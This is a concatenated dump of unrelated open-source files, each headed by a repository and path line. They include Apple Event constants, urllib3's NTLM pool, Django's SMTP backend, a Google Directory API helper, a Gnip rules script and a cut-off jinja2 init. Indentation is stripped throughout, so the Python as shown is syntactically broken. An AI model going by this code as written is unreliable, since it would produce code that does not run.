pPath = FOUR_CHAR_CODE('FTPc')
pUserName = FOUR_CHAR_CODE('RAun')
pUserPassword = FOUR_CHAR_CODE('RApw')
pDNSForm = FOUR_CHAR_CODE('pDNS')
pURL = FOUR_CHAR_CODE('pURL')
pTextEncoding = FOUR_CHAR_CODE('ptxe')
pFTPKind = FOUR_CHAR_CODE('kind')
eScheme = FOUR_CHAR_CODE('esch')
eurlHTTP = FOUR_CHAR_CODE('http')
eurlHTTPS = FOUR_CHAR_CODE('htps')
eurlFTP = FOUR_CHAR_CODE('ftp ')
eurlMail = FOUR_CHAR_CODE('mail')
eurlFile = FOUR_CHAR_CODE('file')
eurlGopher = FOUR_CHAR_CODE('gphr')
eurlTelnet = FOUR_CHAR_CODE('tlnt')
eurlNews = FOUR_CHAR_CODE('news')
eurlSNews = FOUR_CHAR_CODE('snws')
eurlNNTP = FOUR_CHAR_CODE('nntp')
eurlMessage = FOUR_CHAR_CODE('mess')
eurlMailbox = FOUR_CHAR_CODE('mbox')
eurlMulti = FOUR_CHAR_CODE('mult')
eurlLaunch = FOUR_CHAR_CODE('laun')
eurlAFP = FOUR_CHAR_CODE('afp ')
eurlAT = FOUR_CHAR_CODE('at ')
eurlEPPC = FOUR_CHAR_CODE('eppc')
eurlRTSP = FOUR_CHAR_CODE('rtsp')
eurlIMAP = FOUR_CHAR_CODE('imap')
eurlNFS = FOUR_CHAR_CODE('unfs')
eurlPOP = FOUR_CHAR_CODE('upop')
eurlLDAP = FOUR_CHAR_CODE('uldp')
eurlUnknown = FOUR_CHAR_CODE('url?')
kConnSuite = FOUR_CHAR_CODE('macc')
cDevSpec = FOUR_CHAR_CODE('cdev')
cAddressSpec = FOUR_CHAR_CODE('cadr')
cADBAddress = FOUR_CHAR_CODE('cadb')
cAppleTalkAddress = FOUR_CHAR_CODE('cat ')
cBusAddress = FOUR_CHAR_CODE('cbus')
cEthernetAddress = FOUR_CHAR_CODE('cen ')
cFireWireAddress = FOUR_CHAR_CODE('cfw ')
cIPAddress = FOUR_CHAR_CODE('cip ')
cLocalTalkAddress = FOUR_CHAR_CODE('clt ')
cSCSIAddress = FOUR_CHAR_CODE('cscs')
cTokenRingAddress = FOUR_CHAR_CODE('ctok')
cUSBAddress = FOUR_CHAR_CODE('cusb')
pDeviceType = FOUR_CHAR_CODE('pdvt')
pDeviceAddress = FOUR_CHAR_CODE('pdva')
pConduit = FOUR_CHAR_CODE('pcon')
pProtocol = FOUR_CHAR_CODE('pprt')
pATMachine = FOUR_CHAR_CODE('patm')
pATZone = FOUR_CHAR_CODE('patz')
pATType = FOUR_CHAR_CODE('patt')
pDottedDecimal = FOUR_CHAR_CODE('pipd')
pDNS = FOUR_CHAR_CODE('pdns')
pPort = FOUR_CHAR_CODE('ppor')
pNetwork = FOUR_CHAR_CODE('pnet')
pNode = FOUR_CHAR_CODE('pnod')
pSocket = FOUR_CHAR_CODE('psoc')
pSCSIBus = FOUR_CHAR_CODE('pscb')
pSCSILUN = FOUR_CHAR_CODE('pslu')
eDeviceType = FOUR_CHAR_CODE('edvt')
eAddressSpec = FOUR_CHAR_CODE('eads')
eConduit = FOUR_CHAR_CODE('econ')
eProtocol = FOUR_CHAR_CODE('epro')
eADB = FOUR_CHAR_CODE('eadb')
eAnalogAudio = FOUR_CHAR_CODE('epau')
eAppleTalk = FOUR_CHAR_CODE('epat')
eAudioLineIn = FOUR_CHAR_CODE('ecai')
eAudioLineOut = FOUR_CHAR_CODE('ecal')
eAudioOut = FOUR_CHAR_CODE('ecao')
eBus = FOUR_CHAR_CODE('ebus')
eCDROM = FOUR_CHAR_CODE('ecd ')
eCommSlot = FOUR_CHAR_CODE('eccm')
eDigitalAudio = FOUR_CHAR_CODE('epda')
eDisplay = FOUR_CHAR_CODE('edds')
eDVD = FOUR_CHAR_CODE('edvd')
eEthernet = FOUR_CHAR_CODE('ecen')
eFireWire = FOUR_CHAR_CODE('ecfw')
eFloppy = FOUR_CHAR_CODE('efd ')
eHD = FOUR_CHAR_CODE('ehd ')
eInfrared = FOUR_CHAR_CODE('ecir')
eIP = FOUR_CHAR_CODE('epip')
eIrDA = FOUR_CHAR_CODE('epir')
eIRTalk = FOUR_CHAR_CODE('epit')
eKeyboard = FOUR_CHAR_CODE('ekbd')
eLCD = FOUR_CHAR_CODE('edlc')
eLocalTalk = FOUR_CHAR_CODE('eclt')
eMacIP = FOUR_CHAR_CODE('epmi')
eMacVideo = FOUR_CHAR_CODE('epmv')
eMicrophone = FOUR_CHAR_CODE('ecmi')
eModemPort = FOUR_CHAR_CODE('ecmp')
eModemPrinterPort = FOUR_CHAR_CODE('empp')
eModem = FOUR_CHAR_CODE('edmm')
eMonitorOut = FOUR_CHAR_CODE('ecmn')
eMouse = FOUR_CHAR_CODE('emou')
eNuBusCard = FOUR_CHAR_CODE('ednb')
eNuBus = FOUR_CHAR_CODE('enub')
ePCcard = FOUR_CHAR_CODE('ecpc')
ePCIbus = FOUR_CHAR_CODE('ecpi')
ePCIcard = FOUR_CHAR_CODE('edpi')
ePDSslot = FOUR_CHAR_CODE('ecpd')
ePDScard = FOUR_CHAR_CODE('epds')
ePointingDevice = FOUR_CHAR_CODE('edpd')
ePostScript = FOUR_CHAR_CODE('epps')
ePPP = FOUR_CHAR_CODE('eppp')
ePrinterPort = FOUR_CHAR_CODE('ecpp')
ePrinter = FOUR_CHAR_CODE('edpr')
eSvideo = FOUR_CHAR_CODE('epsv')
eSCSI = FOUR_CHAR_CODE('ecsc')
eSerial = FOUR_CHAR_CODE('epsr')
eSpeakers = FOUR_CHAR_CODE('edsp')
eStorageDevice = FOUR_CHAR_CODE('edst')
eSVGA = FOUR_CHAR_CODE('epsg')
eTokenRing = FOUR_CHAR_CODE('etok')
eTrackball = FOUR_CHAR_CODE('etrk')
eTrackpad = FOUR_CHAR_CODE('edtp')
eUSB = FOUR_CHAR_CODE('ecus')
eVideoIn = FOUR_CHAR_CODE('ecvi')
eVideoMonitor = FOUR_CHAR_CODE('edvm')
eVideoOut = FOUR_CHAR_CODE('ecvo')
cKeystroke = FOUR_CHAR_CODE('kprs')
pKeystrokeKey = FOUR_CHAR_CODE('kMsg')
pModifiers = FOUR_CHAR_CODE('kMod')
pKeyKind = FOUR_CHAR_CODE('kknd')
eModifiers = FOUR_CHAR_CODE('eMds')
eOptionDown = FOUR_CHAR_CODE('Kopt')
eCommandDown = FOUR_CHAR_CODE('Kcmd')
eControlDown = FOUR_CHAR_CODE('Kctl')
eShiftDown = FOUR_CHAR_CODE('Ksft')
eCapsLockDown = FOUR_CHAR_CODE('Kclk')
eKeyKind = FOUR_CHAR_CODE('ekst')
eEscapeKey = 0x6B733500
eDeleteKey = 0x6B733300
eTabKey = 0x6B733000
eReturnKey = 0x6B732400
eClearKey = 0x6B734700
eEnterKey = 0x6B734C00
eUpArrowKey = 0x6B737E00
eDownArrowKey = 0x6B737D00
eLeftArrowKey = 0x6B737B00
eRightArrowKey = 0x6B737C00
eHelpKey = 0x6B737200
eHomeKey = 0x6B737300
ePageUpKey = 0x6B737400
ePageDownKey = 0x6B737900
eForwardDelKey = 0x6B737500
eEndKey = 0x6B737700
eF1Key = 0x6B737A00
eF2Key = 0x6B737800
eF3Key = 0x6B736300
eF4Key = 0x6B737600
eF5Key = 0x6B736000
eF6Key = 0x6B736100
eF7Key = 0x6B736200
eF8Key = 0x6B736400
eF9Key = 0x6B736500
eF10Key = 0x6B736D00
eF11Key = 0x6B736700
eF12Key = 0x6B736F00
eF13Key = 0x6B736900
eF14Key = 0x6B736B00
eF15Key = 0x6B737100
kAEAND = FOUR_CHAR_CODE('AND ')
kAEOR = FOUR_CHAR_CODE('OR ')
kAENOT = FOUR_CHAR_CODE('NOT ')
kAEFirst = FOUR_CHAR_CODE('firs')
kAELast = FOUR_CHAR_CODE('last')
kAEMiddle = FOUR_CHAR_CODE('midd')
kAEAny = FOUR_CHAR_CODE('any ')
kAEAll = FOUR_CHAR_CODE('all ')
kAENext = FOUR_CHAR_CODE('next')
kAEPrevious = FOUR_CHAR_CODE('prev')
keyAECompOperator = FOUR_CHAR_CODE('relo')
keyAELogicalTerms = FOUR_CHAR_CODE('term')
keyAELogicalOperator = FOUR_CHAR_CODE('logc')
keyAEObject1 = FOUR_CHAR_CODE('obj1')
keyAEObject2 = FOUR_CHAR_CODE('obj2')
keyAEDesiredClass = FOUR_CHAR_CODE('want')
keyAEContainer = FOUR_CHAR_CODE('from')
keyAEKeyForm = FOUR_CHAR_CODE('form')
keyAEKeyData = FOUR_CHAR_CODE('seld')
keyAERangeStart = FOUR_CHAR_CODE('star')
keyAERangeStop = FOUR_CHAR_CODE('stop')
keyDisposeTokenProc = FOUR_CHAR_CODE('xtok')
keyAECompareProc = FOUR_CHAR_CODE('cmpr')
keyAECountProc = FOUR_CHAR_CODE('cont')
keyAEMarkTokenProc = FOUR_CHAR_CODE('mkid')
keyAEMarkProc = FOUR_CHAR_CODE('mark')
keyAEAdjustMarksProc = FOUR_CHAR_CODE('adjm')
keyAEGetErrDescProc = FOUR_CHAR_CODE('indc')
formAbsolutePosition = FOUR_CHAR_CODE('indx')
formRelativePosition = FOUR_CHAR_CODE('rele')
formTest = FOUR_CHAR_CODE('test')
formRange = FOUR_CHAR_CODE('rang')
formPropertyID = FOUR_CHAR_CODE('prop')
formName = FOUR_CHAR_CODE('name')
typeObjectSpecifier = FOUR_CHAR_CODE('obj ')
typeObjectBeingExamined = FOUR_CHAR_CODE('exmn')
typeCurrentContainer = FOUR_CHAR_CODE('ccnt')
typeToken = FOUR_CHAR_CODE('toke')
typeRelativeDescriptor = FOUR_CHAR_CODE('rel ')
typeAbsoluteOrdinal = FOUR_CHAR_CODE('abso')
typeIndexDescriptor = FOUR_CHAR_CODE('inde')
typeRangeDescriptor = FOUR_CHAR_CODE('rang')
typeLogicalDescriptor = FOUR_CHAR_CODE('logi')
typeCompDescriptor = FOUR_CHAR_CODE('cmpd')
typeOSLTokenList = FOUR_CHAR_CODE('ostl')
kAEIDoMinimum = 0x0000
kAEIDoWhose = 0x0001
kAEIDoMarking = 0x0004
kAEPassSubDescs = 0x0008
kAEResolveNestedLists = 0x0010
kAEHandleSimpleRanges = 0x0020
kAEUseRelativeIterators = 0x0040
typeWhoseDescriptor = FOUR_CHAR_CODE('whos')
formWhose = FOUR_CHAR_CODE('whos')
typeWhoseRange = FOUR_CHAR_CODE('wrng')
keyAEWhoseRangeStart = FOUR_CHAR_CODE('wstr')
keyAEWhoseRangeStop = FOUR_CHAR_CODE('wstp')
keyAEIndex = FOUR_CHAR_CODE('kidx')
keyAETest = FOUR_CHAR_CODE('ktst')
|
Hazelsuko07/17WarmingUp | refs/heads/hy_try | py3.6/lib/python3.6/site-packages/pip/_vendor/requests/packages/urllib3/contrib/ntlmpool.py | 514 | """
NTLM authenticating pool, contributed by erikcederstran
Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10
"""
from __future__ import absolute_import
try:
from http.client import HTTPSConnection
except ImportError:
from httplib import HTTPSConnection
from logging import getLogger
from ntlm import ntlm
from urllib3 import HTTPSConnectionPool
log = getLogger(__name__)
class NTLMConnectionPool(HTTPSConnectionPool):
"""
Implements an NTLM authentication version of an urllib3 connection pool
"""
scheme = 'https'
def __init__(self, user, pw, authurl, *args, **kwargs):
"""
authurl is a random URL on the server that is protected by NTLM.
user is the Windows user, probably in the DOMAIN\\username format.
pw is the password for the user.
"""
super(NTLMConnectionPool, self).__init__(*args, **kwargs)
self.authurl = authurl
self.rawuser = user
user_parts = user.split('\\', 1)
self.domain = user_parts[0].upper()
self.user = user_parts[1]
self.pw = pw
def _new_conn(self):
# Performs the NTLM handshake that secures the connection. The socket
# must be kept open while requests are performed.
self.num_connections += 1
log.debug('Starting NTLM HTTPS connection no. %d: https://%s%s',
self.num_connections, self.host, self.authurl)
headers = {}
headers['Connection'] = 'Keep-Alive'
req_header = 'Authorization'
resp_header = 'www-authenticate'
conn = HTTPSConnection(host=self.host, port=self.port)
# Send negotiation message
headers[req_header] = (
'NTLM %s' % ntlm.create_NTLM_NEGOTIATE_MESSAGE(self.rawuser))
log.debug('Request headers: %s', headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
reshdr = dict(res.getheaders())
log.debug('Response status: %s %s', res.status, res.reason)
log.debug('Response headers: %s', reshdr)
log.debug('Response data: %s [...]', res.read(100))
# Remove the reference to the socket, so that it can not be closed by
# the response object (we want to keep the socket open)
res.fp = None
# Server should respond with a challenge message
auth_header_values = reshdr[resp_header].split(', ')
auth_header_value = None
for s in auth_header_values:
if s[:5] == 'NTLM ':
auth_header_value = s[5:]
if auth_header_value is None:
raise Exception('Unexpected %s response header: %s' %
(resp_header, reshdr[resp_header]))
# Send authentication message
ServerChallenge, NegotiateFlags = \
ntlm.parse_NTLM_CHALLENGE_MESSAGE(auth_header_value)
auth_msg = ntlm.create_NTLM_AUTHENTICATE_MESSAGE(ServerChallenge,
self.user,
self.domain,
self.pw,
NegotiateFlags)
headers[req_header] = 'NTLM %s' % auth_msg
log.debug('Request headers: %s', headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
log.debug('Response status: %s %s', res.status, res.reason)
log.debug('Response headers: %s', dict(res.getheaders()))
log.debug('Response data: %s [...]', res.read()[:100])
if res.status != 200:
if res.status == 401:
raise Exception('Server rejected request: wrong '
'username or password')
raise Exception('Wrong server response: %s %s' %
(res.status, res.reason))
res.fp = None
log.debug('Connection established')
return conn
def urlopen(self, method, url, body=None, headers=None, retries=3,
redirect=True, assert_same_host=True):
if headers is None:
headers = {}
headers['Connection'] = 'Keep-Alive'
return super(NTLMConnectionPool, self).urlopen(method, url, body,
headers, retries,
redirect,
assert_same_host)
|
hilaskis/UAV_MissionPlanner | refs/heads/master | Lib/site-packages/scipy/setup.py | 59 |
def configuration(parent_package='',top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration('scipy',parent_package,top_path)
config.add_subpackage('cluster')
config.add_subpackage('constants')
config.add_subpackage('fftpack')
config.add_subpackage('integrate')
config.add_subpackage('interpolate')
config.add_subpackage('io')
config.add_subpackage('lib')
config.add_subpackage('linalg')
config.add_subpackage('maxentropy')
config.add_subpackage('misc')
config.add_subpackage('odr')
config.add_subpackage('optimize')
config.add_subpackage('signal')
config.add_subpackage('sparse')
config.add_subpackage('spatial')
config.add_subpackage('special')
config.add_subpackage('stats')
config.add_subpackage('ndimage')
config.add_subpackage('weave')
config.make_svn_version_py() # installs __svn_version__.py
config.make_config_py()
return config
if __name__ == '__main__':
from numpy.distutils.core import setup
setup(**configuration(top_path='').todict())
|
vdmann/cse-360-image-hosting-website | refs/heads/master | lib/python2.7/site-packages/pip/_vendor/html5lib/treewalkers/pulldom.py | 1729 | from __future__ import absolute_import, division, unicode_literals
from xml.dom.pulldom import START_ELEMENT, END_ELEMENT, \
COMMENT, IGNORABLE_WHITESPACE, CHARACTERS
from . import _base
from ..constants import voidElements
class TreeWalker(_base.TreeWalker):
def __iter__(self):
ignore_until = None
previous = None
for event in self.tree:
if previous is not None and \
(ignore_until is None or previous[1] is ignore_until):
if previous[1] is ignore_until:
ignore_until = None
for token in self.tokens(previous, event):
yield token
if token["type"] == "EmptyTag":
ignore_until = previous[1]
previous = event
if ignore_until is None or previous[1] is ignore_until:
for token in self.tokens(previous, None):
yield token
elif ignore_until is not None:
raise ValueError("Illformed DOM event stream: void element without END_ELEMENT")
def tokens(self, event, next):
type, node = event
if type == START_ELEMENT:
name = node.nodeName
namespace = node.namespaceURI
attrs = {}
for attr in list(node.attributes.keys()):
attr = node.getAttributeNode(attr)
attrs[(attr.namespaceURI, attr.localName)] = attr.value
if name in voidElements:
for token in self.emptyTag(namespace,
name,
attrs,
not next or next[1] is not node):
yield token
else:
yield self.startTag(namespace, name, attrs)
elif type == END_ELEMENT:
name = node.nodeName
namespace = node.namespaceURI
if name not in voidElements:
yield self.endTag(namespace, name)
elif type == COMMENT:
yield self.comment(node.nodeValue)
elif type in (IGNORABLE_WHITESPACE, CHARACTERS):
for token in self.text(node.nodeValue):
yield token
else:
yield self.unknown(type)
|
banmoy/ns3 | refs/heads/master | src/core/examples/sample-rng-plot.py | 188 | # -*- Mode:Python; -*-
# /*
# * This program is free software; you can redistribute it and/or modify
# * it under the terms of the GNU General Public License version 2 as
# * published by the Free Software Foundation
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# */
# Demonstrate use of ns-3 as a random number generator integrated with
# plotting tools; adapted from Gustavo Carneiro's ns-3 tutorial
import numpy as np
import matplotlib.pyplot as plt
import ns.core
# mu, var = 100, 225
rng = ns.core.NormalVariable(100.0, 225.0)
x = [rng.GetValue() for t in range(10000)]
# the histogram of the data
n, bins, patches = plt.hist(x, 50, normed=1, facecolor='g', alpha=0.75)
plt.title('ns-3 histogram')
plt.text(60, .025, r'$\mu=100,\ \sigma=15$')
plt.axis([40, 160, 0, 0.03])
plt.grid(True)
plt.show()
|
boundarydevices/android_external_chromium_org | refs/heads/cm-12.0 | tools/cr/cr/base/arch.py | 113 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A module for the basic architectures supported by cr."""
import cr
DEFAULT = cr.Config.From(
CR_ENVSETUP_ARCH='{CR_ARCH}',
)
class Arch(cr.Plugin, cr.Plugin.Type):
"""Base class for implementing cr architecture targets."""
SELECTOR = 'CR_ARCH'
@classmethod
def AddArguments(cls, parser):
parser.add_argument(
'--architecture', dest=cls.SELECTOR,
choices=cls.Choices(),
default=None,
help='Sets the target architecture to use. Overrides ' + cls.SELECTOR
)
class IA32Arch(Arch):
ACTIVE = cr.Config.From(
CR_ENVSETUP_ARCH='ia32',
)
class Mips32Arch(Arch):
ACTIVE = cr.Config.From(
CR_ENVSETUP_ARCH='mipsel',
)
@property
def enabled(self):
return cr.AndroidPlatform.GetInstance().is_active
class X64Arch(Arch):
ACTIVE = cr.Config.From(
CR_ENVSETUP_ARCH='x64',
)
@property
def priority(self):
return super(X64Arch, self).priority + 1
class Arm32Arch(Arch):
ACTIVE = cr.Config.From(
CR_ENVSETUP_ARCH='arm',
)
@property
def priority(self):
return super(Arm32Arch, self).priority + 2
@property
def enabled(self):
return cr.AndroidPlatform.GetInstance().is_active
class Arm64Arch(Arch):
ACTIVE = cr.Config.From(
CR_ENVSETUP_ARCH='arm64',
)
@property
def enabled(self):
return cr.AndroidPlatform.GetInstance().is_active
|
CodeCatz/litterbox | refs/heads/master | Natasa/Vaja_13.py | 1 | # Input method to pass variables to a script (py files)
# Import - this is how you add features (MODULE) to your script from
# Python feature (MODULE) set.
# argv = "argument variable" - it holds arguments you pass when you run it
from sys import argv
# "unpacks" argv : Take whatever in ARGV, unpack it and assign it
# to all of those variables on the left in order
script, first, second, third = argv
print "The script is called: ", script
print "Your first variable is: ", first
print "Your second variable is: ", second
print "Your third variable: ", third
# You run this from command line - python Vaja_13.py hamburger marmelada sir
|
zturchan/CMPUT410-Lab4 | refs/heads/master | env-lab4/lib/python2.7/ntpath.py | 4 | /usr/lib/python2.7/ntpath.py |
uccgit/the-game | refs/heads/sandbox | src/Menu/__init__.py | 7 | __author__ = 'tootall'
|
pasqualguerrero/django | refs/heads/master | django/core/mail/backends/smtp.py | 477 | """SMTP email backend class."""
import smtplib
import ssl
import threading
from django.conf import settings
from django.core.mail.backends.base import BaseEmailBackend
from django.core.mail.message import sanitize_address
from django.core.mail.utils import DNS_NAME
class EmailBackend(BaseEmailBackend):
"""
A wrapper that manages the SMTP network connection.
"""
def __init__(self, host=None, port=None, username=None, password=None,
use_tls=None, fail_silently=False, use_ssl=None, timeout=None,
ssl_keyfile=None, ssl_certfile=None,
**kwargs):
super(EmailBackend, self).__init__(fail_silently=fail_silently)
self.host = host or settings.EMAIL_HOST
self.port = port or settings.EMAIL_PORT
self.username = settings.EMAIL_HOST_USER if username is None else username
self.password = settings.EMAIL_HOST_PASSWORD if password is None else password
self.use_tls = settings.EMAIL_USE_TLS if use_tls is None else use_tls
self.use_ssl = settings.EMAIL_USE_SSL if use_ssl is None else use_ssl
self.timeout = settings.EMAIL_TIMEOUT if timeout is None else timeout
self.ssl_keyfile = settings.EMAIL_SSL_KEYFILE if ssl_keyfile is None else ssl_keyfile
self.ssl_certfile = settings.EMAIL_SSL_CERTFILE if ssl_certfile is None else ssl_certfile
if self.use_ssl and self.use_tls:
raise ValueError(
"EMAIL_USE_TLS/EMAIL_USE_SSL are mutually exclusive, so only set "
"one of those settings to True.")
self.connection = None
self._lock = threading.RLock()
def open(self):
"""
Ensures we have a connection to the email server. Returns whether or
not a new connection was required (True or False).
"""
if self.connection:
# Nothing to do if the connection is already open.
return False
connection_class = smtplib.SMTP_SSL if self.use_ssl else smtplib.SMTP
# If local_hostname is not specified, socket.getfqdn() gets used.
# For performance, we use the cached FQDN for local_hostname.
connection_params = {'local_hostname': DNS_NAME.get_fqdn()}
if self.timeout is not None:
connection_params['timeout'] = self.timeout
if self.use_ssl:
connection_params.update({
'keyfile': self.ssl_keyfile,
'certfile': self.ssl_certfile,
})
try:
self.connection = connection_class(self.host, self.port, **connection_params)
# TLS/SSL are mutually exclusive, so only attempt TLS over
# non-secure connections.
if not self.use_ssl and self.use_tls:
self.connection.ehlo()
self.connection.starttls(keyfile=self.ssl_keyfile, certfile=self.ssl_certfile)
self.connection.ehlo()
if self.username and self.password:
self.connection.login(self.username, self.password)
return True
except smtplib.SMTPException:
if not self.fail_silently:
raise
def close(self):
"""Closes the connection to the email server."""
if self.connection is None:
return
try:
try:
self.connection.quit()
except (ssl.SSLError, smtplib.SMTPServerDisconnected):
# This happens when calling quit() on a TLS connection
# sometimes, or when the connection was already disconnected
# by the server.
self.connection.close()
except smtplib.SMTPException:
if self.fail_silently:
return
raise
finally:
self.connection = None
def send_messages(self, email_messages):
"""
Sends one or more EmailMessage objects and returns the number of email
messages sent.
"""
if not email_messages:
return
with self._lock:
new_conn_created = self.open()
if not self.connection:
# We failed silently on open().
# Trying to send would be pointless.
return
num_sent = 0
for message in email_messages:
sent = self._send(message)
if sent:
num_sent += 1
if new_conn_created:
self.close()
return num_sent
def _send(self, email_message):
"""A helper method that does the actual sending."""
if not email_message.recipients():
return False
from_email = sanitize_address(email_message.from_email, email_message.encoding)
recipients = [sanitize_address(addr, email_message.encoding)
for addr in email_message.recipients()]
message = email_message.message()
try:
self.connection.sendmail(from_email, recipients, message.as_bytes(linesep='\r\n'))
except smtplib.SMTPException:
if not self.fail_silently:
raise
return False
return True
|
adhintz/password-alert | refs/heads/master | server/google_directory_service.py | 2 | # Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module to interact with Google Directory API."""
import logging
from apiclient.discovery import build
import config
import datastore
import httplib2
from oauth2client import appengine
from oauth2client.client import AccessTokenRefreshError
import setup
from google.appengine.api import memcache
from google.appengine.ext import ndb
API_SERVICE_NAME = 'admin'
DIRECTORY_API_VERSION = 'directory_v1'
MEMCACHE_ADMIN_KEY = 'admins'
MEMCACHE_EXPIRATION_TIME_IN_SECONDS = 600
class SetupNeeded(Exception):
pass
def _GetAuthorizedHttp(credentials=None):
"""Get the authorized http from the stored credentials.
The client library will validate and refresh credentials as needed.
Args:
credentials: Optional credentials to use instead of any in the datastore.
Returns:
authorized http, a "httplib2.Http" instance, with the proper authentication
header, access token, and credential.
Raises:
SetupNeeded: An exception that there are no credentails in the datastore.
"""
if not credentials:
credential_storage = appengine.StorageByKeyName(
appengine.CredentialsModel,
datastore.CURRENT_DOMAIN,
'credentials')
credentials = credential_storage.get()
if credentials:
logging.debug('Successfully got credentials from storage.')
else:
if config.SERVICE_ACCOUNT:
credentials = setup.LoadCredentialsFromPem()
else:
raise SetupNeeded('Credentials not in storage')
return credentials.authorize(httplib2.Http())
def BuildService(credentials=None):
"""Build the directory api service.
Args:
credentials: Optional credentials to use instead of any in the datastore.
Returns:
service object for interacting with the directory api
Raises:
Exception: An exception that that the PEM file content is not valid.
"""
try:
return build(
serviceName=API_SERVICE_NAME,
version=DIRECTORY_API_VERSION,
http=_GetAuthorizedHttp(credentials))
except NotImplementedError:
ndb.Key('CredentialsModel', datastore.CURRENT_DOMAIN).delete()
raise Exception('The service account credentials are invalid. '
'Check to make sure you have a valid PEM file and you '
'have removed any extra data attributes that may have '
'been written to the PEM file when converted from '
'PKCS12. The existing PEM key has been revoked and '
'needs to be updated with a new valid key.')
def _GetAdminEmails():
"""Get the emails of the members of the admin group.
Returns:
admin_emails: Emails of the members of the admin group.
"""
admin_emails = []
admin_group_info = BuildService().members().list(
groupKey=datastore.Setting.get('admin_group')).execute()
for member in admin_group_info['members']:
admin_emails.append(member['email'])
memcache.set(datastore.CURRENT_DOMAIN + ':' + MEMCACHE_ADMIN_KEY,
admin_emails,
MEMCACHE_EXPIRATION_TIME_IN_SECONDS)
return admin_emails
def IsInAdminGroup(user):
"""Determine if the user is a member of the admin group.
The memcache will be checked first. If not in memcache, we will then
make the api call, and then save into memcache for future use.
Args:
user: appengine user object
Returns:
boolean: True if user is a member of the admin group. False otherwise.
Raises:
Exception: If ADMIN_GROUP is not configured in config.py
SetupNeeded: If oauth token no longer works.
"""
try:
user_info = GetUserInfo(user.email())
except AccessTokenRefreshError:
ndb.Key('CredentialsModel', datastore.CURRENT_DOMAIN).delete()
raise SetupNeeded('oauth token no longer valid')
# TODO(adhintz) memcache this isAdmin check.
if user_info.get('isAdmin', '') or user_info.get('isDelegatedAdmin', ''):
logging.info('user is a domain admin')
return True
logging.debug('Checking if %s is in admin group.', user.nickname())
if not datastore.Setting.get('admin_group'):
raise Exception('You must configure ADMIN_GROUP in config.py')
cached_admin_emails = memcache.get(
datastore.CURRENT_DOMAIN + ':' + MEMCACHE_ADMIN_KEY)
if cached_admin_emails is not None:
logging.debug('Admin info is found in memcache.')
if user.email() in cached_admin_emails:
return True
else:
return False
logging.debug('Admin info is not found in memcache.')
if user.email() in _GetAdminEmails():
return True
return False
def GetUserInfo(user_email):
"""Get the user info.
Args:
user_email: String of the user email.
Returns:
user_info: A dictionary of the user's domain info.
"""
logging.debug('Getting domain info for %s.', user_email)
user_info = BuildService().users().get(userKey=user_email).execute()
return user_info
def UpdateUserInfo(user_email, new_user_info):
"""Updates the user info.
Args:
user_email: String of the user email.
new_user_info: A dictionary of the user's new domain info to be updated.
"""
logging.debug('Updating domain info for %s.', user_email)
BuildService().users().update(
userKey=user_email, body=new_user_info).execute()
|
huxianglin/pythonstudy | refs/heads/master | week06-胡湘林/选课系统/bin/admin.py | 1 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
用于为管理员用户提供相关操作,如:学校、课程、老师等相关操作
"""
import os
import sys
BASEDIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(BASEDIR)
from src.service import admin_service
def execute():
admin_service.main()
if __name__ == '__main__':
execute()
|
gnip/support | refs/heads/master | Rules API/Python/AddRule.py | 1 | #!/usr/bin/env python
import urllib2
import base64
import json
import xml
import sys
def post():
# Expected Premium Stream URL Format:
# https://api.gnip.com:443/accounts/<account>/publishers/<publisher>/streams/<stream>/<label>/rules.json
url = 'ENTER_RULES_API_URL_HERE'
UN = 'ENTER_USERNAME_HERE'
PWD = 'ENTER_PASSWORD_HERE'
rule = 'testRule'
tag = 'testTag'
values = '{"rules": [{"value":"' + rule + '","tag":"' + tag + '"}]}'
base64string = base64.encodestring('%s:%s' % (UN, PWD)).replace('\n', '')
req = urllib2.Request(url=url, data=values)
req.add_header('Content-type', 'application/json')
req.add_header("Authorization", "Basic %s" % base64string)
try:
response = urllib2.urlopen(req)
except urllib2.HTTPError as e:
print e.read()
the_page = response.read()
print the_page
if __name__ == "__main__":
post()
|
csrgxtu/Google-Slave | refs/heads/master | src/GAE-Slave/lib/jinja2/__init__.py | 256 | # -*- coding: utf-8 -*-
"""
jinja2
~~~~~~
Jinja2 is a template engine written in pure Python. It provides a
Django inspired non-XML syntax but supports inline expressions and
an optional sandboxed environment.
Nutshell
--------
Here a small example of a Jinja2 template::
{% extends 'base.html' %}
{% block title %}Memberlist{% endblock %}
{% block content %}
<ul>
{% for user in users %}
<li><a href="{{ user.url }}">{{ user.username }}</a></li>
{% endfor %}
</ul>
{% endblock %}
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
__docformat__ = 'restructuredtext en'
__version__ = '2.7.3'
# high level interface
from jinja2.environment import Environment, Template
# loaders
from jinja2.loaders import BaseLoader, FileSystemLoader, PackageLoader, \
DictLoader, FunctionLoader, PrefixLoader, ChoiceLoader, \
ModuleLoader
# bytecode caches
from jinja2.bccache import BytecodeCache, FileSystemBytecodeCache, \
MemcachedBytecodeCache
# undefined types
from jinja2.runtime import Undefined, DebugUndefined, StrictUndefined
# exceptions
from jinja2.exceptions import TemplateError, UndefinedError, \
TemplateNotFound, TemplatesNotFound, TemplateSyntaxError, \
TemplateAssertionError
# decorators and public utilities
from jinja2.filters import environmentfilter, contextfilter, \
evalcontextfilter
from jinja2.utils import Markup, escape, clear_caches, \
